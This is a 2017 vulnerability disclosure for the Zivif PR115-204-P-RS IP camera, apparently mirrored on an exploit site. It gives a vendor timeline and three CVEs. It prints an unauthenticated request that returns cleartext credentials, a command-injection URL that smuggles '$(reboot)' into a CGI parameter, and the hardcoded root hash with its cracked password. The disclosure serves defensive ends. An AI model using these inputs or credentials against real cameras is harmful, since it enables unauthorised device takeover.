Zivif PR115-204-P-RS 2.3.4.2103 Bypass / Command Injection / Hardcoded Password Vulnerabilities

🗓️ 14 Dec 2017 00:00:00Reported by Silas CutlerType

zdt🔗 0day.today👁 62 Views

Zivif camera vulnerabilities, bypassing access controls, command injection, hardcoded passwor

Reporter	Title	Published	Views	Family All 41
0daydb	Zivif Camera 2.3.4.2103 iptest.cgi Blind Remote Command Execution	21 Jun 202009:03	–	0daydb
0day.today	Zivif Camera 2.3.4.2103 iptest.cgi Blind Remote Command Execution Exploit	16 Jun 202000:00	–	zdt
ATTACKERKB	CVE-2017-17106	19 Dec 201700:00	–	attackerkb
ATTACKERKB	CVE-2017-17105	19 Dec 201700:00	–	attackerkb
BDU FSTEC	The vulnerability of the Zivif PR115-204-P-RS webcam’s microprogramming software relates to the use of pre-installed credentials, allowing a intruder to gain access to the device with root privileges.	1 Feb 201800:00	–	bdu_fstec
BDU FSTEC	The vulnerability of the Zivif PR115-204-P-RS webcam’s microprogramming software, related to errors in managing registration data, allows a hacker to obtain user login credentials.	1 Feb 201800:00	–	bdu_fstec
BDU FSTEC	The vulnerability of the Zivif PR115-204-P-RS webcam’s microprogramming software is related to the lack of measures taken to neutralize special elements, allowing intruders to execute arbitrary commands.	1 Feb 201800:00	–	bdu_fstec
Circl	CVE-2017-17105	16 Jun 202012:15	–	circl
Circl	CVE-2017-17106	26 Nov 202415:14	–	circl
CNVD	Zivif PR115-204-P-RS Information Disclosure Vulnerability	2 Jan 201800:00	–	cnvd

Researcher: Silas Cutler `p1nk` <[email protected]>
Release date: December 10, 2017
Full Disclosure: 90 days
CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107
Vulnerable Device: Zivif PR115-204-P-RS
Version: V2.3.4.2103


Timeline:
1 September 2017: Initial alerting to Zivif
1 September 2017: Zivif contact established.
3 September 2017: Details provided.
7 September 2017: Confirmation of vulnerabilities from Zivif
5 December 2017: Public note on Social Media CVE-2017-17105,
CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic.
10 December 2017: This email


-[Overview]-
Implementation of access controls is Zivif cameras is severely lacking.
As a result, CGI functions can be called directly, bypassing
authentication checks.

This was first identified with the following request (CVE-2017-17106)
http://<Camera Address>/web/cgi-bin/hi3510/param.cgi?cmd=getuser
Cameras respond to this with:

var name0="admin"; var password0="admin"; var authLevel0="255"; var
name1="guest"; var password1="guest"; var authLevel1="3"; var
name2="admin2"; var password2="admin"; var authLevel2="3"; var name3="";
var password3=""; var authLevel3="3"; var name4=""; var password4="";
var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3";
var name6=""; var password6=""; var authLevel6="3"; var name7=""; var
password7=""; var authLevel7="3"; var name8=""; var password8=""; var
authLevel8="0"; var name9=""; var password9=""; var authLevel9="0
Credentials are returned in cleartext to the requester.

In exploring, unauthenticated remote command injection is possible using
(CVE-2017-17105)
http://<Camera
IP>/cgi-bin/iptest.cgi?cmd=iptest.cgi&-time="1504225666237"&-url=$(reboot)

Command results are not returned, however are executed by the system.

One last findings was the /etc/passwd file contains the following
hard-coded entry (CVE-2017-17107):
root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh

The encrypted password is cat1029.

(none) login: root
Password:
Login incorrect
(none) login: root
Password:
Welcome to SONIX.
\[email protected]\h:\W$
Because of the way the file system is structured, changing this password
requires more work then running passwd.

-[Note]-
The hi3510 is shared with a couple other cameras I'm exploring.  The
motd saying /Welcome to SONIX/ has lead me to speculate parts of this
firmware may be shared with other cameras.



-Silas

#  0day.today [2018-03-19]  #

14 Dec 2017 00:00Current

9.7High risk

Vulners AI Score9.7

EPSS0.84847